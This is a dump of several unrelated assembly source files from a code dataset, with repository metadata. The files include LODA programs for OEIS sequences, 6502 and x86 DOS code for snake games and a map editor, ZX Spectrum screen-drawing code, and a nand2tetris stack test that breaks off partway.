TheStack | 32b8ce66d74f5ce24c2b877d33cf8d7c820f31a1 | Assemblycode:Assembly | {"size": 716, "ext": "asm", "max_stars_repo_path": "oeis/212/A212510.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/212/A212510.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/212/A212510.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 59.6666666667, "max_line_length": 500, "alphanum_fraction": 0.7611731844} | ; A212510: Number of (w,x,y,z) with all terms in {1,...,n} and w<2x and y>3z.
; Submitted by Jamie Morken(s4)
; 0,0,0,0,12,38,81,185,336,549,900,1365,1944,2794,3822,5070,6720,8680,10935,13821,17100,20853,25410,30569,36288,43148,50700,59076,68796,79506,91125,104545,119040,134805,152592,171853,192456,215670,240426,266994,296400,327860,361179,398069,437052,478485,523710,571665,622080,677176,735000,796008,861900,931294,1003833,1082313,1164240,1250181,1342236,1438661,1539000,1646690,1758630,1875510,1999872,2129568,2264031,2407405,2555916,2710389,2873850,3043705,3219264,3405444,3597732,3797100,4007100,4224650
mov $2,$0
seq $0,238410 ; a(n) = floor((3(n-1)^2 + 1)/2).
sub $2,1
bin $2,2
div $2,3
mul $0,$2
div $0,2
|
||||
TheStack | 8088e82323348613ba20cdd5b08f2f119e749002 | Assemblycode:Assembly | {"size": 86, "ext": "asm", "max_stars_repo_path": "libsrc/_DEVELOPMENT/math/float/math48/lm/z80/asm_fmod.asm", "max_stars_repo_name": "meesokim/z88dk", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "libsrc/_DEVELOPMENT/math/float/math48/lm/z80/asm_fmod.asm", "max_issues_repo_name": "meesokim/z88dk", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "libsrc/_DEVELOPMENT/math/float/math48/lm/z80/asm_fmod.asm", "max_forks_repo_name": "meesokim/z88dk", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 9.5555555556, "max_line_length": 25, "alphanum_fraction": 0.8255813953} |
SECTION code_fp_math48
PUBLIC asm_fmod
EXTERN am48_fmod
defc asm_fmod = am48_fmod
|
||||
TheStack | 7e07c2033bc517e8837d5f185cfd153718cb3bfb | Assemblycode:Assembly | {"size": 474, "ext": "asm", "max_stars_repo_path": "programs/oeis/316/A316828.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/316/A316828.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/316/A316828.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 67.7142857143, "max_line_length": 201, "alphanum_fraction": 0.5569620253} | ; A316828: Image of the Thue-Morse sequence A010060 under the morphism {1 -> 1,2; 0 -> 0,2}.
; 0,2,1,2,1,2,0,2,1,2,0,2,0,2,1,2,1,2,0,2,0,2,1,2,0,2,1,2,1,2,0,2,1,2,0,2,0,2,1,2,0,2,1,2,1,2,0,2,0,2,1,2,1,2,0,2,1,2,0,2,0,2,1,2,1,2,0,2,0,2,1,2,0,2,1,2,1,2,0,2,0,2,1,2,1,2,0,2,1,2,0,2,0,2,1,2,0,2,1,2
seq $0,89214 ; Let u(1)=0, u(2)=1; for k>2, u(k)= A010060(k)*u(k-1) + u(k-2) (mod 2); then a(n)=4n-b(n) where sequence (b(k)) gives values such that u(b(k))=0.
min $0,3
sub $0,1
|
||||
TheStack | 4caedaf94467cab1943dec206413dc5d10906c53 | Assemblycode:Assembly | {"size": 698, "ext": "asm", "max_stars_repo_path": "oeis/001/A001900.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/001/A001900.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/001/A001900.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 46.5333333333, "max_line_length": 486, "alphanum_fraction": 0.8424068768} | ; A001900: Successive numerators of Wallis's approximation to Pi/2 (unreduced).
; Submitted by Jamie Morken(s3)
; 1,2,4,16,64,384,2304,18432,147456,1474560,14745600,176947200,2123366400,29727129600,416179814400,6658877030400,106542032486400,1917756584755200,34519618525593600,690392370511872000,13807847410237440000,303772643025223680000,6682998146554920960000,160391955517318103040000,3849406932415634472960000,100084580242806496296960000,2602199086312968903720960000,72861574416763129304186880000,2040124083669367620517232640000,61203722510081028615516979200000,1836111675302430858465509376000000
mov $3,1
lpb $0
mov $2,$0
sub $0,1
add $2,1
div $2,2
mul $3,2
mul $3,$2
lpe
mov $0,$3
|
||||
TheStack | d20178ef307b627c66241dff91dd22ea2800be66 | Assemblycode:Assembly | {"size": 685, "ext": "asm", "max_stars_repo_path": "oeis/293/A293639.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/293/A293639.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/293/A293639.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 45.6666666667, "max_line_length": 489, "alphanum_fraction": 0.7883211679} | ; A293639: a(n) is the greatest integer k such that k/Fibonacci(n) < 2/5.
; Submitted by Jon Maiga
; 0,0,0,0,1,2,3,5,8,13,22,35,57,93,150,244,394,638,1033,1672,2706,4378,7084,11462,18547,30010,48557,78567,127124,205691,332816,538507,871323,1409831,2281154,3690986,5972140,9663126,15635267,25298394,40933662,66232056,107165718,173397774,280563493,453961268,734524761,1188486029,1923010790,3111496819,5034507610,8146004429,13180512039,21326516469,34507028508,55833544978,90340573486,146174118464,236514691951,382688810416,619203502368,1001892312784,1621095815152,2622988127936,4244083943089
mov $3,1
lpb $0
sub $0,1
mov $2,$3
add $3,$1
mov $1,$2
lpe
mov $0,$1
mul $0,2
div $0,5
|
||||
TheStack | a8a4f4dfcc9ceb89d2beee2e7b8163a76167bbe8 | Assemblycode:Assembly | {"size": 396, "ext": "asm", "max_stars_repo_path": "oeis/131/A131491.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/131/A131491.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/131/A131491.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 28.2857142857, "max_line_length": 210, "alphanum_fraction": 0.7853535354} | ; A131491: 2*prime(n)!.
; Submitted by Jamie Morken(s1)
; 4,12,240,10080,79833600,12454041600,711374856192000,243290200817664000,51704033477769953280000,17683523987479403909087232000000,16445677308355845635451125760000000,27527506182452690092631959163161804800000000
seq $0,6005 ; The odd prime numbers together with 1.
mov $2,$0
lpb $0
sub $0,2
add $1,$0
mul $2,$1
lpe
mov $0,$2
mul $0,4
|
||||
TheStack | b81155b5775f4b019efd9ad177aa1ef53628bf98 | Assemblycode:Assembly | {"size": 2185, "ext": "asm", "max_stars_repo_path": "move.asm", "max_stars_repo_name": "dreamingPainter/c64-snake", "max_stars_repo_stars_event_min_datetime": "2021-04-03T02:43:29.000Z", "max_stars_repo_stars_event_max_datetime": "2021-04-03T02:43:29.000Z", "max_issues_repo_path": "move.asm", "max_issues_repo_name": "dreamingPainter/c64-snake", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "move.asm", "max_forks_repo_name": "dreamingPainter/c64-snake", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 15.2797202797, "max_line_length": 55, "alphanum_fraction": 0.5812356979} | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; move 根据d中的值实现蛇的移动
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.scope
.data zp
.space _stail 2 ; 蛇尾指针
.space _tmp 1
.text
move:
;lda #0 ;演示用
;sta eat
lda eat ;eat判断
bne _head_move ;吃到食物直接进入模式一:head move,否则先执行tail move
lda #csps
ldy #0
sta (_stail),y ;tail move
ldy #40
lda (_stail),y
cmp #csnk ;down search
bne +
lda #40
jsr _propergate_tail
* ldy #1
lda (_stail),y
cmp #csnk ;right search
bne +
lda #1
jsr _propergate_tail
* jsr _copy_to_ptr
lda #40
sta _tmp
jsr _borrow_ptr
ldy #0
lda (_ptr),y
cmp #csnk ;up search
bne +
jsr _copy_to_tail
* jsr _copy_to_ptr
lda #1
sta _tmp
jsr _borrow_ptr
lda (_ptr),y
cmp #csnk ;left search
bne _head_move
jsr _copy_to_tail
;;;;;;;;;;;;;;;;;;;;;;;;;
; head move
;;;;;;;;;;;;;;;;;;;;;;;;;
_head_move:
;lda #go_l ;测试用
`_m_judge_dir_head go_d, 40, _propergate_head
`_m_judge_dir_head go_r, 1, _propergate_head
`_m_judge_dir_head go_l, 1, _borrow_head
`_m_judge_dir_head go_u, 40, _borrow_head
rts
move_init:
lda #csnk
sta field + 10*40 + 19 ; 初始化蛇位置
sta field + 11*40 + 19 ; 初始化蛇位置
lda #<[field + 11*40 + 19] ;初始化蛇头
ldx #>[field + 11*40 + 19]
sta shead
stx shead+1
lda #<[field + 10*40 + 19] ;初始化蛇尾
ldx #>[field + 10*40 + 19]
sta _stail
stx _stail+1
rts
_propergate_tail:
`_m_propergate _stail
_propergate_head:
`_m_propergate shead
;;;;;;;;;;;;;;;;;;;;;;;;
; 减法借位,入参为_tmp
;;;;;;;;;;;;;;;;;;;;;;;;
_borrow_ptr:
`_m_borrow _ptr
_borrow_head:
`_m_borrow shead
_copy_to_ptr:
lda _stail
sta _ptr
lda _stail+1
sta _ptr+1
rts
_copy_to_tail:
lda _ptr
sta _stail
lda _ptr+1
sta _stail+1
rts
.scend
;;;;;;;;;;;;;;;;;;;;;;;;
; 加法进位,入参为a
;;;;;;;;;;;;;;;;;;;;;;;;
.macro _m_propergate
clc
adc _1
sta _1
bcc _end
inc _1+1
_end:
rts
.macend
;;;;;;;;;;;;;;;;;;;;;;;;
; _tmp:减数 _1:被减数
;;;;;;;;;;;;;;;;;;;;;;;;
.macro _m_borrow
lda _1
sec
sbc _tmp
sta _1
bcs _end
dec _1+1
_end:
rts
.macend
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; _1:方向 _2:进位/借位数 _3:进位/借位函数
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.macro _m_judge_dir_head
lda d
cmp #_1
bne _next
lda #_2
sta _tmp
jsr _3
lda #csnk
sta (shead),y
rts
_next:
.macend |
||||
TheStack | 77f00b655ea2bb7dc4b71866d9e484c0be81347c | Assemblycode:Assembly | {"size": 6206, "ext": "asm", "max_stars_repo_path": "map.asm", "max_stars_repo_name": "MohammedAlsayedOmar/Multiplayer-Snake", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "map.asm", "max_issues_repo_name": "MohammedAlsayedOmar/Multiplayer-Snake", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "map.asm", "max_forks_repo_name": "MohammedAlsayedOmar/Multiplayer-Snake", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 15.7512690355, "max_line_length": 65, "alphanum_fraction": 0.6213341927} | assume CS:Code_segment_name,DS:Data_segment_name
;COMMENT FOR MUSGI .. EL BETA3A EL SAHLA -
Main2 proc far
mov[inMain],0
mov [obstcales],50
mov [mode],0
call far ptr clearscreenm
call far ptr drawlinem
call far ptr setcruser
Bonus:
;===========
call far ptr Recieve1
cmp [Sentdata],3bh
jne contenu
mov [Sentdata],0
;else print you have been invited
;setCurser
mov bh,0
mov dl,0 ;col zero
mov dh,23 ;row 23
mov ah,2h
int 10h
;print
lea dx,GuestName+2 ;load $
mov ah,9
int 21h
lea dx,GuestDesign ;load $
mov ah,9
int 21h
;setCur Back
mov bh,0
mov dl, byte ptr(col) ;col zero
mov dh,byte ptr(row) ;row 23
mov ah,2h
int 10h
contenu:
mov ah,1
int 16h
jz Bonus
;===========================
call far ptr getinput
cmp al,1bh;quit (esq)
je endmd
call far ptr checkinput
call far ptr setcruser
cmp mode,1 ; drawing obstacles
je draww
cmp mode,2
je savem
cmp mode,3
je loadm
cmp mode,4
je deleteobstt
jmp Bonus
draww:
call far ptr drawobst
jmp Bonus
savem:
call far ptr savemap
mov mode,0 ; reset the mode
mov base,0
jmp Bonus
loadm:
mov [obstcales],50d
call far ptr loadmap
mov mode,0 ; reset the mode
mov temp ,0
jmp Bonus
deleteobstt:
call far ptr deletobst
mov mode,0
jmp Bonus
endmd:
mov [Sentdata],'q' ;send q because escape exit prog
call far ptr Send1
call far ptr clearscreenm
retf
Main2 endp
clearscreenm proc near
mov ax,0003h
int 10h
retf
clearscreenm endp
setcruser proc near
mov AH, 02h
mov bh,0
mov DH,byte ptr(row) ;y
mov DL,byte ptr(col) ;x
int 10h
retf
setcruser endp
getinput proc near
mov ax,0
int 16h
retf
getinput endp
checkinput proc near
cmp ax, 4800h ;UP.
je arrow_up
cmp ax, 5000h ;DOWN.
je arrow_down
cmp ax, 4B00h ;LEFT.
je arrow_left
cmp ax, 4D00h ;RIGHT.
je arrow_right
cmp al,73h ;save map (s)
je savmap
cmp al,6ch ;load map (L)
je loamap
cmp al,70h ;print mode obst (p)
je changemode
cmp al,64h ;delete d
je deletemode
jmp endddd
arrow_up:
cmp row,0
je rowend
sub [row],1
retf
arrow_down:
cmp row,20
je rowstart
add [row],1
retf
arrow_left:
cmp col,0
je colright
sub [col],1
retf
arrow_right:
cmp col,79
je colleft
add [col],1
retf
deletemode:
mov [mode],4
retf
changemode:
cmp mode,0
je change
mov [mode],0
retf
change:
mov [mode],1
retf
rowend:
mov [row],20
retf
rowstart:
mov row,0
retf
colright:
mov col,79
retf
colleft:
mov col,0
retf
savmap:
mov mode,2
retf
loamap:
mov [mode],3
retf
endddd:
retf
checkinput endp
drawobst proc near
cmp obstcales,0
je NoMore
mov ah,08h ;to check if we are making obstcale above each other
int 10h
cmp ah,77h ;compare the returned att with the att
je NoMore
mov ax,row
mov bl,80
mul bl
add ax,col
mov bx,ax
mov map[bx],31h
mov al,20h
mov bh,0
mov bl,77h
mov cx,1
mov ah,9
int 10h
sub [obstcales],1
NoMore:
retf
drawobst endp
checkobst proc near
mov ax,0000
mov ax,row
mov bl,80
mul bl
add ax,col
mov bx,ax
cmp map[bx],31h
je No
mov bx,0
retf
No:
mov bx,1
retf
checkobst endp
deletobst proc near
mov ax,0000
mov ax,row
mov bl,80
mul bl
add ax,col
mov bx,ax
cmp map[bx],31h
jne quitsx
mov map[bx],30h
add [obstcales],1
call far ptr setcruser
mov al,20h
mov bh,0
mov bl,07h
mov cx,1
mov ah,9
int 10h
quitsx:
retf
deletobst endp
drawlinem proc near
mov cx,80
mov ax,0b800h
mov es,ax
mov di,21*160
draw:
lea si,split
movsw
loop draw
retf
drawlinem endp
openfileSL proc near
cmp al,31h
je saveto1
cmp al,32h
je saveto2
cmp al,33h
je saveto3
jmp retttt
saveto1:
lea dx,filename1
jmp openSl
saveto2:
lea dx,filename2
jmp openSl
saveto3:
lea dx,filename3
openSl:
mov ah,3dh ;opening file
mov al,2 ;2 read/write
int 21h
jc ERROROPENs;jump if there is carry (carry=error)
mov fileHandle,ax ;store ax in file handle
retf
ERROROPENs:
lea dx,err
mov ah,09
int 21h
retttt:
retf
openfileSL endp
readfilesl proc near
mov dx,offset map
mov [temp],0
ReadBytess:
mov ah,3fh ;read from file
mov bx,fileHandle
mov cx,1
int 21h
jc ERRORREADs
mov cx,1
cmp ax,cx
jne EndOfFiles
mov bx,temp
cmp map[bx],31h
jne check0s
cmp obstcales,0
je reto
sub obstcales,1
add [temp],1
inc dx
jmp ReadBytess
check0s:
cmp map[bx],30h
jne EndOfFiles
add [temp],1
inc dx
jmp ReadBytess
ERRORREADs:
lea dx,errR
mov ah,09
int 21h
retf
EndOfFiles: ;Close File
mov bx,fileHandle
mov ah,3eh ;close file
int 21h
reto:
retf
readfilesl endp
savemap proc near
;set curser
mov ah,02h
mov bh,0
mov dh,22 ;y
mov dl,0 ;x
int 10h
;print save msg
lea dx,savestate
mov ah,09h
int 21h
call far ptr getinput
call far ptr openfileSL
;writing to file
writefile:
cmp base,1680
je quit
mov bx,base
cmp map[bx],30h
je setdx0
lea dx,map1
jmp write
setdx0:
lea dx,map0
write:
mov AH,40h
mov BX ,fileHandle
mov CX,1
int 21h
add [base],1
jmp writefile
quit:
mov bx,fileHandle
mov ah,3eh ;close file
int 21h
;clear notif area
mov ah,02h
mov bh,0
mov dh,22 ;y
mov dl,0 ;x
int 10h
;print save msg
lea dx,clear
mov ah,09h
int 21h
call far ptr setcruser
retf
savemap endp
loadmap proc near
mov ah,02h
mov bh,0
mov dh,22 ;y
mov dl,0 ;x
int 10h
;print save msg
lea dx,loadstate
mov ah,09h
int 21h
call far ptr getinput
call far ptr openfileSL
call far ptr readfilesl
call far ptr drawmapM
mov ah,02h
mov bh,0
mov dh,22 ;y
mov dl,0 ;x
int 10h
;print save msg
lea dx,clear
mov ah,09h
int 21h
call far ptr setcruser
retf
loadmap endp
|
||||
TheStack | 1145634ac1bffa73d89198a3bba64b011bce0af4 | Assemblycode:Assembly | {"size": 613, "ext": "asm", "max_stars_repo_path": "oeis/092/A092390.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/092/A092390.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/092/A092390.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 51.0833333333, "max_line_length": 429, "alphanum_fraction": 0.7194127243} | ; A092390: a(n) = prime(n) + prime(2n).
; Submitted by Jamie Morken(s2)
; 5,10,18,26,40,50,60,72,84,100,110,126,142,150,160,184,198,212,230,244,254,272,282,312,326,340,354,370,380,394,420,442,454,476,498,510,530,546,564,582,600,614,634,650,660,678,702,726,748,770,790,808,818,844,858,876,888,912,924,940,956,976,1008,1030,1046,1060,1088,1106,1134,1158,1174,1186,1206,1230,1242,1264,1276,1308,1330,1350,1372,1392,1414,1430,1452,1464,1482,1506,1522,1532,1558,1576,1596,1614,1650,1666,1690,1714,1736,1764
mov $1,$0
seq $0,40 ; The prime numbers.
mul $1,2
add $1,1
seq $1,40 ; The prime numbers.
add $1,$0
mov $0,$1
|
||||
TheStack | e17b348098380cb536450061aa3749bca9351a95 | Assemblycode:Assembly | {"size": 242, "ext": "asm", "max_stars_repo_path": "programs/oeis/024/A024140.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/024/A024140.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/024/A024140.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 30.25, "max_line_length": 175, "alphanum_fraction": 0.7892561983} | ; A024140: a(n) = 12^n-1.
; 0,11,143,1727,20735,248831,2985983,35831807,429981695,5159780351,61917364223,743008370687,8916100448255,106993205379071,1283918464548863,15407021574586367,184884258895036415
mov $1,12
pow $1,$0
sub $1,1
mov $0,$1
|
||||
TheStack | 9802308762a1b3c959ea69493639f0013c2baa97 | Assemblycode:Assembly | {"size": 1372, "ext": "asm", "max_stars_repo_path": "transformy/tables/outro/000d.asm", "max_stars_repo_name": "mborik/regression", "max_stars_repo_stars_event_min_datetime": "2019-09-18T05:34:22.000Z", "max_stars_repo_stars_event_max_datetime": "2020-12-04T17:46:52.000Z", "max_issues_repo_path": "transformy/tables/outro/000d.asm", "max_issues_repo_name": "mborik/regression", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "transformy/tables/outro/000d.asm", "max_forks_repo_name": "mborik/regression", "max_forks_repo_forks_event_min_datetime": "2020-01-17T01:04:24.000Z", "max_forks_repo_forks_event_max_datetime": "2020-01-17T01:04:24.000Z"} | {"max_stars_count": 3, "max_issues_count": null, "max_forks_count": 1, "avg_line_length": 24.0701754386, "max_line_length": 29, "alphanum_fraction": 0.5779883382} | xor a
ld d,a
ld e,a
ld (basescradr + #0937), de
ld (basescradr + #09b5), de
ld hl, basescradr + #0d18
ld (hl), a
inc hl
ld (hl), a
inc hl
ld (hl), a
ld (basescradr + #0d55), de
ld (basescradr + #0d95), de
ld (basescradr + #0dd6), de
ld (basescradr + #0956), a
ld (basescradr + #0975), a
ld (basescradr + #0995), a
ld (basescradr + #09d6), a
ld (basescradr + #09f7), a
ld (basescradr + #0d37), a
ld (basescradr + #0d75), a
ld (basescradr + #0db6), a
ld a, 4
ld (basescradr + #0939), a
ld (basescradr + #0957), a
ld (basescradr + #0976), a
ld (basescradr + #0996), a
ld (basescradr + #09d7), a
ld (basescradr + #0d38), a
ld (basescradr + #0d76), a
ld (basescradr + #0db7), a
ld a, 68
ld d,a
ld e,a
ld (basescradr + #093b), de
ld (basescradr + #095b), de
ld (basescradr + #097c), de
ld (basescradr + #09bc), de
ld (basescradr + #09db), de
ld (basescradr + #09f9), de
ld (basescradr + #0d3b), de
ld (basescradr + #0d5c), de
ld (basescradr + #0d9d), de
ld (basescradr + #0dbc), de
ld (basescradr + #0dda), de
ld (basescradr + #099d), a
ld (basescradr + #0d7d), a
ld a, 64
ld (basescradr + #095d), a
ld (basescradr + #099e), a
ld (basescradr + #09be), a
ld (basescradr + #09fb), a
ld (basescradr + #0d3d), a
ld (basescradr + #0d7e), a
ld (basescradr + #0ddc), a
ret
|
||||
TheStack | 6ad2231c33accc04ea3d26aef2c910d401b4dc8c | Assemblycode:Assembly | {"size": 559, "ext": "asm", "max_stars_repo_path": "oeis/157/A157803.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/157/A157803.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/157/A157803.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 93.1666666667, "max_line_length": 496, "alphanum_fraction": 0.8711985689} | ; A157803: 8984250*n - 8464830.
; 519420,9503670,18487920,27472170,36456420,45440670,54424920,63409170,72393420,81377670,90361920,99346170,108330420,117314670,126298920,135283170,144267420,153251670,162235920,171220170,180204420,189188670,198172920,207157170,216141420,225125670,234109920,243094170,252078420,261062670,270046920,279031170,288015420,296999670,305983920,314968170,323952420,332936670,341920920,350905170,359889420,368873670,377857920,386842170,395826420,404810670,413794920,422779170,431763420,440747670,449731920
mul $0,8984250
add $0,519420
|
||||
TheStack | cfeee034cbbe6905ccf6f8d5b32444af76446e83 | Assemblycode:Assembly | {"size": 70, "ext": "asm", "max_stars_repo_path": "src/main/fragment/mos6502-common/vwsm1=pwsc1_derefidx_vbuxx_minus_vwsc2.asm", "max_stars_repo_name": "jbrandwood/kickc", "max_stars_repo_stars_event_min_datetime": "2022-03-01T02:21:14.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-01T04:33:35.000Z", "max_issues_repo_path": "src/main/fragment/mos6502-common/vwum1=pwuc1_derefidx_vbuxx_minus_vwuc2.asm", "max_issues_repo_name": "jbrandwood/kickc", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "src/main/fragment/mos6502-common/vwum1=pwuc1_derefidx_vbuxx_minus_vwuc2.asm", "max_forks_repo_name": "jbrandwood/kickc", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 2, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 8.75, "max_line_length": 12, "alphanum_fraction": 0.5285714286} | lda {c1},x
sec
sbc #<{c2}
sta {m1}
lda {c1}+1,x
sbc #>{c2}
sta {m1}+1
|
||||
TheStack | e0b368e0efd2ffa136b4736c563e702463c2478c | Assemblycode:Assembly | {"size": 2903, "ext": "asm", "max_stars_repo_path": "code/nand2tetris/07/StackArithmetic/StackTest/StackTest.asm", "max_stars_repo_name": "MarybethGasman/sp", "max_stars_repo_stars_event_min_datetime": "2018-11-09T07:48:20.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-08T04:33:29.000Z", "max_issues_repo_path": "code/nand2tetris/07/StackArithmetic/StackTest/StackTest.asm", "max_issues_repo_name": "MarybethGasman/sp", "max_issues_repo_issues_event_min_datetime": "2019-07-18T20:37:51.000Z", "max_issues_repo_issues_event_max_datetime": "2019-07-31T02:20:31.000Z", "max_forks_repo_path": "code/nand2tetris/07/StackArithmetic/StackTest/StackTest.asm", "max_forks_repo_name": "MarybethGasman/sp", "max_forks_repo_forks_event_min_datetime": "2019-01-11T03:32:43.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-19T08:28:18.000Z"} | {"max_stars_count": 252, "max_issues_count": 1, "max_forks_count": 95, "avg_line_length": 5.6259689922, "max_line_length": 22, "alphanum_fraction": 0.5652772993} | // init
@256
D=A
@R0
M=D
// push constant 17
@17
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 17
@17
D=A
@SP
A=M
M=D
@SP
M=M+1
// eq
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL1
D;JEQ
@SP
A=M
M=0
@LABEL2
0;JMP
(LABEL1)
@SP
A=M
M=-1
(LABEL2)
@SP
M=M+1
// push constant 17
@17
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 16
@16
D=A
@SP
A=M
M=D
